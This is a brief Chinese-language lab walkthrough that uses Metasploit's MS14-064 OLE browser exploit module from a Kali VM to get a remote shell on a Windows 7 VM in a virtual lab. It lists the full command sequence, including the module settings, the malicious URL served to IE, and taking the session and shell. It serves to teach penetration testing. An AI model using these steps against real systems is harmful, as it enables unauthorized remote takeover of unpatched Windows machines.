一、环境准备
? ? ? ? 利用VMware安装win7虚拟机x1,kali Linux虚拟机x1.
二、实验步骤
1.命令行输入以下命令启动metasploit
msfconsole
2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_execution
search ms14
3.输入以下命令加载漏洞利用模块
use exploit/windows/browser/ms14_064_ole_code_execution
?这里可以看到我们的漏洞利用模块已经被启动。
4.输入以下命令查看相关设置
show options
?需要我们注意的是这里的AllowPowershellP默认为false,SRCVHOST默认为0.0.0.0,需要我们手动更改。
?5.分别输入以下两个命令更改设置,注意这里我的kali虚拟机IP地址为192.168.15.138,可以在终端输入ifconfig查看自己的IP地址。
set AllowPowershellP true //设置AllowPowershellP为true
set SRVHOST 192.168.15.138 //设置SRVHOST为192.168.15.138(需要更改为自己的kali虚拟机IP)
?设置更改完成后在终端输入exploit/rexploit执行可以得到一串URL地址。
6.轮到我们的受害者登场,开启win7虚拟机,使用IE浏览器访问刚才得到的地址。
这时只要点击允许,这台win7虚拟机就被我们拿下啦!
7.回到kali虚拟机终端可以看到我们的受害者win7(IP地址为192.168.15.140)已经被拿下
输入以下命令查看
sessions -i?
?8.输入以下命令进入shell
sessions -i 1接下来就可以利用windows命令进行下一步的行动啦!
